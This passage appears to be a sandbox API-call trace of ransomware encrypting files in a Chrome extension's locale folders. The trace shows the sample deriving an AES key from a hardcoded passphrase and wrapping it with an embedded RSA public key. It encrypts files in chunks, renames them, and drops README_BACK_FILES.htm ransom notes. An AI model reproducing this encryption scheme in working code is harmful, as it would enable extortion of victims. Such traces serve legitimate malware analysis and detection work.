nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.923] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x182, lpOverlapped=0x0) returned 1 [0262.923] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x182, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x190) returned 1 [0262.923] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x190, lpOverlapped=0x0) returned 1 [0262.924] CloseHandle (hObject=0x5d60) returned 1 [0262.924] CloseHandle (hObject=0x5d5c) returned 1 [0262.924] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0262.926] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0262.927] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.gsg")) returned 1 [0262.928] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\messages.json.fuck")) returned 1 [0262.929] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0262.929] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0262.929] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.929] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0262.929] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0262.929] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0262.929] AreFileApisANSI () returned 1 [0262.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 163 [0262.929] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.930] GetFileType (hFile=0x5d64) returned 0x1 [0262.930] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0262.931] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0262.931] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0262.931] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.931] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0262.931] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0262.931] GetLastError () returned 0x0 [0262.931] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json")) returned 0x20 [0262.932] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0262.932] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0262.933] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0262.934] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0262.934] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0262.936] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0262.936] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0262.936] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0262.936] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0262.937] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0262.937] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0262.937] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e743c8) returned 1 [0262.937] CryptImportPublicKeyInfo (in: hCryptProv=0x2e743c8, dwCertEncodingType=0x1, pInfo=0x2eae460*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eae490*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eae498*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e6c0) returned 1 [0262.937] CryptEncrypt (in: hKey=0x2e7e6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0262.937] CryptEncrypt (in: hKey=0x2e7e6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74560*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74560*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0262.937] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e74560*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74560*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0262.938] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.942] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.942] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.947] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.948] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.948] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.948] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.948] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.948] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.948] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.949] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.949] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.949] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.949] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.949] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.949] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.950] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0262.950] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0262.950] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 